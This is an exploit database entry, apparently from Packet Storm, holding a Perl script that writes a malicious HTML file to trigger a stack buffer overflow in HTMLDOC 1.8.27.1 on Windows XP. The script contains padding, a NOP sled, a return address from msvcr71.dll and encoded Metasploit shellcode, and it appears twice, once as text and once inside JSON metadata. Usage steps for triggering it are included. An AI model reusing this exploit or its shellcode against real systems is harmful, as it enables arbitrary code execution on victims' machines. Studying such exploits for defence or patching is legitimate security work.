ID PACKETSTORM:79358
Type packetstorm
Reporter ksa04
Modified 2009-07-17T00:00:00
Description
`#!/usr/bin/perl
# htmldoc 1.8.27.1 (.html) Universal Stack Overflow Exploit
# http://en.securitylab.ru/poc/extra/382563.php >> Bufferoverflow POC
# By ksa04
# j-7[at]hotmail[dot]com
# From Kingdom of Saudi Arabia
#[+]--------------------------------------------------------------------------------------[+]#
# program : HTMLDOC
# version : all versions (tested 1.8.27.1 and 1.8.27 and 1.8.24)
# website program : http://www.htmldoc.org
# Download : http://www.easysw.com/htmldoc/software.php
# Tested Under Windows XP SP3
# NOTE : launching from directory >> htmldoc -f lol.pdf exploit.html
# or launching HTMLDOC.exe >> add file >> Document type (wEb page or continuous) >>
# put any thing in Output >> Generate
#[+]--------------------------------------------------------------------------------------[+]#
# win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
my $shellcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44".
"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47".
"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38".
"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48".
"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c".
"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58".
"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44".
"\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38".
"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33".
"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47".
"\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a".
"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b".
"\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53".
"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57".
"\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39".
"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46".
"\x4e\x46\x43\x36\x42\x50\x5a";
$payload = "<!-- MEDIA SIZE 1x1".
"\x41" x 248 .
"\x90" x 20 .
"\x30\x5C\x34\x7C". # push esp msvcr71.dll
$shellcode.
"-->\n";
open(vuln,'>>exploit.html');
print vuln $payload;
print "[+] Done !! [+]";
close(vuln);
`
{"type": "packetstorm", "published": "2009-07-17T00:00:00", "reporter": "ksa04", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "5906119871398d408c1eac67ce1c3038"}, {"key": "modified", "hash": "3f6d3983e922a301e56b747ecf926cd1"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "3f6d3983e922a301e56b747ecf926cd1"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "1ae0406cde5ed5de4c380e6bb1abbbb1"}, {"key": "sourceData", "hash": "f755ed6e283b0c4ae08557af299af7e1"}, {"key": "sourceHref", "hash": "276180d7d27d3910f3b96ce704cb1a15"}, {"key": "title", "hash": "107dab3de1370c3bcf394b33cfb28faf"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "bulletinFamily": "exploit", "cvss": {"vector": "NONE", "score": 0.0}, "sourceData": "`#!/usr/bin/perl \n# htmldoc 1.8.27.1 (.html) Universal Stack Overflow Exploit \n# http://en.securitylab.ru/poc/extra/382563.php >> Bufferoverflow POC \n# By ksa04 \n# j-7[at]hotmail[dot]com \n# From Kingdom of Saudi Arabia \n#[+]--------------------------------------------------------------------------------------[+]# \n# program : HTMLDOC \n# version : all versions (tested 1.8.27.1 and 1.8.27 and 1.8.24) \n# website program : http://www.htmldoc.org \n# Download : http://www.easysw.com/htmldoc/software.php \n# Tested Under Windows XP SP3 \n# NOTE : launching from directory >> htmldoc -f lol.pdf exploit.html \n# or launching HTMLDOC.exe >> add file >> Document type (wEb page or continuous) >> \n# put any thing in Output >> Generate \n#[+]--------------------------------------------------------------------------------------[+]# \n# win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com \nmy $shellcode = \n\"\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x4f\\x49\\x49\\x49\\x49\\x49\". \n\"\\x49\\x51\\x5a\\x56\\x54\\x58\\x36\\x33\\x30\\x56\\x58\\x34\\x41\\x30\\x42\\x36\". \n\"\\x48\\x48\\x30\\x42\\x33\\x30\\x42\\x43\\x56\\x58\\x32\\x42\\x44\\x42\\x48\\x34\". \n\"\\x41\\x32\\x41\\x44\\x30\\x41\\x44\\x54\\x42\\x44\\x51\\x42\\x30\\x41\\x44\\x41\". \n\"\\x56\\x58\\x34\\x5a\\x38\\x42\\x44\\x4a\\x4f\\x4d\\x4e\\x4f\\x4a\\x4e\\x46\\x44\". \n\"\\x42\\x30\\x42\\x50\\x42\\x30\\x4b\\x48\\x45\\x54\\x4e\\x43\\x4b\\x38\\x4e\\x47\". \n\"\\x45\\x50\\x4a\\x57\\x41\\x30\\x4f\\x4e\\x4b\\x58\\x4f\\x54\\x4a\\x41\\x4b\\x38\". \n\"\\x4f\\x45\\x42\\x42\\x41\\x50\\x4b\\x4e\\x49\\x44\\x4b\\x38\\x46\\x33\\x4b\\x48\". \n\"\\x41\\x50\\x50\\x4e\\x41\\x53\\x42\\x4c\\x49\\x59\\x4e\\x4a\\x46\\x58\\x42\\x4c\". \n\"\\x46\\x57\\x47\\x30\\x41\\x4c\\x4c\\x4c\\x4d\\x30\\x41\\x30\\x44\\x4c\\x4b\\x4e\". \n\"\\x46\\x4f\\x4b\\x53\\x46\\x55\\x46\\x32\\x46\\x50\\x45\\x47\\x45\\x4e\\x4b\\x58\". \n\"\\x4f\\x45\\x46\\x52\\x41\\x50\\x4b\\x4e\\x48\\x56\\x4b\\x58\\x4e\\x50\\x4b\\x44\". \n\"\\x4b\\x48\\x4f\\x55\\x4e\\x41\\x41\\x30\\x4b\\x4e\\x4b\\x58\\x4e\\x41\\x4b\\x38\". \n\"\\x41\\x50\\x4b\\x4e\\x49\\x48\\x4e\\x45\\x46\\x32\\x46\\x50\\x43\\x4c\\x41\\x33\". \n\"\\x42\\x4c\\x46\\x46\\x4b\\x38\\x42\\x44\\x42\\x53\\x45\\x38\\x42\\x4c\\x4a\\x47\". \n\"\\x4e\\x30\\x4b\\x48\\x42\\x44\\x4e\\x50\\x4b\\x58\\x42\\x37\\x4e\\x51\\x4d\\x4a\". \n\"\\x4b\\x48\\x4a\\x36\\x4a\\x30\\x4b\\x4e\\x49\\x50\\x4b\\x38\\x42\\x58\\x42\\x4b\". \n\"\\x42\\x50\\x42\\x50\\x42\\x50\\x4b\\x38\\x4a\\x36\\x4e\\x43\\x4f\\x45\\x41\\x53\". \n\"\\x48\\x4f\\x42\\x46\\x48\\x35\\x49\\x38\\x4a\\x4f\\x43\\x48\\x42\\x4c\\x4b\\x57\". \n\"\\x42\\x45\\x4a\\x36\\x42\\x4f\\x4c\\x38\\x46\\x30\\x4f\\x35\\x4a\\x46\\x4a\\x39\". \n\"\\x50\\x4f\\x4c\\x38\\x50\\x50\\x47\\x55\\x4f\\x4f\\x47\\x4e\\x43\\x46\\x41\\x46\". \n\"\\x4e\\x46\\x43\\x36\\x42\\x50\\x5a\"; \n$payload = \"<!-- MEDIA SIZE 1x1\". \n\"\\x41\" x 248 . \n\"\\x90\" x 20 . \n\"\\x30\\x5C\\x34\\x7C\". # push esp msvcr71.dll \n$shellcode. \n\"-->\\n\"; \nopen(vuln,'>>exploit.html'); \nprint vuln $payload; \nprint \"[+] Done !! [+]\"; \nclose(vuln); \n \n`\n", "viewCount": 0, "history": [], "lastseen": "2016-11-03T10:18:33", "objectVersion": "1.2", "href": "https://packetstormsecurity.com/files/79358/htmldoc-1.8.27.1-Stack-Overflow.html", "sourceHref": "https://packetstormsecurity.com/files/download/79358/htmldoc18271-overflow.txt", "title": "htmldoc 1.8.27.1 Stack Overflow", "enchantments": {"score": {"vector": "NONE", "value": 9.3}, "vulnersScore": 9.3}, "references": [], "id": "PACKETSTORM:79358", "hash": "2f42892aa03fc6d1b8edf7e6b5534b56ea1602c2ccec5130e94aa8354221574c", "edition": 1, "cvelist": [], "modified": "2009-07-17T00:00:00", "description": ""}
{}
